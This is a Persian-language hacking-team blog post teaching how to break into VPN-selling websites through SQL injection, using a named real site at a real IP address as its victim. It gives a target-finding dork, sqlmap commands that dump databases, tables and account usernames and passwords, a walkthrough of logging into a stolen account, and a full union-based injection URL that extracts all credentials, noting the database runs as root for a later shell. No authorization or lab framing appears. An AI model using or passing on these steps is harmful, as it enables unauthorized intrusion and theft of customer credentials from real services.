• 98XXXXXXXXXX+
  • mynymhmd2@gmail.com
  • TEHRAN-IRAN
  • 98914XXXXXXX+
تیم امنیتی دکترهک

Dr.Hack Team

Android - Windows - Linux

آموزش نفوذ به سایت های فروش وی پی ان

آموزش نفوذ به سایت های فروش وی پی ان

با سلام خدمت تمامی دوستان عزیز و کاربران محترم دکتر هک

 

توضیحی راجب آسیب پذیری Sql Injection : 

 

خب نکته ای که باید توجه کنیم داده ها از کاربر به دیتابیس میرسه و دلیل اصلی آسیب پذیری فیلتر نکردن ورودی های کاربر در لایه اپلکیشن هست که باعث رسیدن دستورات بهره برداری کاربر به دیتابیس میشه و خب دیتابیس هم فقط دستورات رو اجرا میکنه و خروجی در لایه نمایش دیده میشود.

 

اگر میخواهید پست علت به وجود آمدن باگ در اپلیکیشن وب (SQL injection) رو به صورت کامل مطالعه کنید کلیک کنید

 

در ابتدا با استفاده از دورک زیر تارگت خودمون رو انتخاب می کنیم.

inurl:index.php inurl:group= inurl:mode=auto

 

که بنده در این آموزش قصد نفوذ به وبسایت عمو وی پی ان رو دارم برای این منظور وارد وبسایت می شویم.

 

برروی محصولات کلیک کرده و وارد پلان ها و تعرفه ها می شویم.

 

از این قسمت یکی از پلان ها را سفارش می دهیم.

 

در این قسمت پارامتر group آسیب پذیری SQL Injection از نوع Time Based دارد.

 

حال برای اینکه روند کار با سرعت بیشتری پیش برود از ابزار SQLmap استفاده می کنیم و تنها یک اکانت را دامپ می کنیم. برای این منظور در ابتدا با استفاده از دستور زیر نام دیتابیس های مورد نظر را بدست می آوریم.

sqlmap -u “http://78.129.193.62/index.php?Req=direct&group=3” -p group –level 3 –risk 3 –dbs

 

سپس Table ها دیتابیس مورد نظر را با استفاده از دستور زیر بدست می آوریم.

sqlmap -u “http://78.129.193.62/index.php?Req=direct&group=3” -p group –level 3 –risk 3 -D amoid –tables

 

در این مرحله باید Column های مربوط به جدول Account را بدست بیاوریم.

 

حال کافی است یوزر نیم و پسورد یکی از اکانت ها را بدست بیاوریم.

sqlmap -u “http://78.129.193.62/index.php?Req=direct&group=3” -p group –level 3 –risk 3 -D amoid -T account -C username,password –dump

 

پس از بدست آوردن یوزرنیم و پسورد یکی از اکانت ها باید وارد اکانت مورد نظر شویم.

 

سپس برروی گزینه خرید / انتخاب سرویس کلیک می کنیم.

 

حال یکی از سرویس ها را انتخاب می کنیم و برروی تمدید کلیک می کنیم.

 

با اضافه کردن یک ‘ به آخر پارامتر id وجود آسیب پذیری SQLi را بررسی می کنیم.

 

همانطور که مشاهده کردید صفحه ناقص لود شد. حال دستور Order+By+1%23+’ را به آخر پارامتر id اضافه می کنیم.

 

با اضافه کردن دستور بالا صفحه به طور کامل لود شد. بنابر این مطمئن می شویم که آسیب پذیری SQLi در وبسایت قطعی می باشد، با بالا و پایین کردن عدد مربوطه به تعداد Column های موجود پی می بریم.

پس از آن با استفاده از دستور Union Select بررسی می کنیم که چند column در Query استفاده شده است.

 

همونطور که مشاده کردید می توانیم از ستون ۱ استفاده کنیم. برای مثال بنده عبارت user() رو وارد می کنم تا از یوزر دیتابیس مطلع شویم.

 

همانطور که مشاهده کردید یوزر دیتابیس نیز root می باشد … دوستان می تونن بعدا شل بگیرن 
در نهایت با استفاده از دستور زیر تمامی یوزر نیم ها و پسور ها را بدست می آوریم.

http://78.129.193.62/user/index.php?Req=invoice&id=-18455’+UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(account)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x207c20,password,0x3c62723e))))x),2,3,4,5,6,7,8,9,10,11%23

 

امیدوارم که از این آموزش هم لذت کافی را برده باشید … حتما نظرات خودتون رو با ما درمیون بزارید 

 
سفارش محصول
ابتدا یکبار کدامنیتی را تعویض سپس وارد کنید
 
 
تنها امکان ارسال نظر خصوصی وجود دارد
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی
نظر شما به هیچ وجه امکان عمومی شدن در قسمت نظرات را ندارد، و تنها راه پاسخگویی به آن نیز از طریق پست الکترونیک می‌باشد. بنابراین در صورتیکه مایل به دریافت پاسخ هستید، پست الکترونیک خود را وارد کنید.